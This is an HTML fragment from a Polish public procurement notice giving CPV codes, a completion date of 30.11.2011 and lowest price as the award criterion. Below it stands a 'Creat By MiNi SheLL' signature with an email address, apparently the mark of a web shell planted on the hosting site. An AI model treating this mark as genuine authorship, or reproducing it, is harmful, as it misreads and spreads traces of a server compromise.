<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 98.39.00.00-3, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com